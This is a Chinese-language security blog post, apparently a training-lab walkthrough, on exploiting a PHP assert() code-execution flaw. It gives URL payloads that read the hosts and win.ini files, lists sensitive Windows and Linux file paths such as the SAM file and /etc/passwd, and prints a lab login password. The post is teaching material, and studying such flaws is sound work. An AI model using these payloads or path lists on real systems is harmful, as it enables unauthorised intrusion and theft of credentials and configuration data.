文章总结： 本文介绍远程命令执行漏洞利用实验，通过向PHP页面URL参数注入代码读取Windows系统敏感文件如hosts和win.ini，从而泄露操作系统信息。实验列举了Windows和Linux常见敏感文件路径，演示了具体利用步骤，强调需尽可能收集敏感文件路径以实施有效攻击。 综合评分： 60 文章分类： 渗透测试,WEB安全,漏洞分析,实战经验

原来你的操作系统信息是这样被泄露的

原创

建哥聊安全 建哥聊安全

建哥聊安全

2026年3月17日 08:35 湖南

远程命令执行漏洞利用之读取文件

免责声明：严格禁止对任何未授权系统/网络进行扫描、攻击或入侵。 禁止制作/传播恶意程序，禁止参与任何网络犯罪。如擅自将本文实验技术用于非法用途，一切法律后果及责任由行为人独立承担，与作者无关。

实验目的

通过本实验，掌握命令执行漏洞产生的原因和利用方法，体验命令执行漏洞的利用过程。

实验环境

·操作机：Win10 用户名：Administrator 密码：Sangfor!7890

·靶机：Apache + PHP

·实验地址：http://ip/os/assert.php

实验原理

利用远程命令执行漏洞可以读取一些操作系统的敏感文件，从而获取重要信息。 Windows系统敏感信息：

C:\boot.ini //查看系统版本

C:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件

C:\windows\repair\sam //windows初次安装的密码

C:\program Files\mysql\my.ini //Mysql配置信息

C:\program Files\mysql\data\mysql\user.MYD //Mysql root C:\windows\php.ini                         //php配置信息

……

Linux系统敏感信息：

/etc/passwd //linux用户信息

/usr/local/app/apache2/conf/httpd.conf //apache2配置文件

/usr/local/app/php5/lib/php.ini //php配置文件

/etc/httpd/conf/httpd.conf //apache配置文件

/etc/my.cnf //Mysql配置文件

……

实验步骤

1、登录”Attack”操作机，打开浏览器，访问http://ip/os/assert.php

2、在URL后拼接

“?a=var_dump(file_get_contents(‘C:\Windows\System32\drivers\etc\hosts’))＂，访问http://ip/os/assert.php?a=var_dump(file_get_contents(‘C:\Windows\System32\drivers\etc\hosts’))，执行代码，获取hosts文件信息

3、在URL后拼接

“?a=var_dump(file_get_contents(‘C:\Windows\win.ini’))＂，访问http://ip/os/assert.php?a=var_dump(file_get_contents(‘C:\Windows\win.ini’))，执行代码，获取win.ini文件信息

实验总结

通过本实验，掌握远程命令执行漏洞的利用，读取敏感文件，获取重要信息，所以需要尽可能多的收集敏感文件的路径。

创作不易，内容如对你有帮助，可以点个关注，转载时请务必注明原作者及原始出处链接，感谢配合。戳下面关注 ↓↓↓

往期文章：

这样改完，购物直接0元购？

电脑中了勒索病毒？试试这个方法。

不会写shell？来看看这篇文章

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：建哥聊安全 建哥聊安全 建哥聊安全《原来你的操作系统信息是这样被泄露的》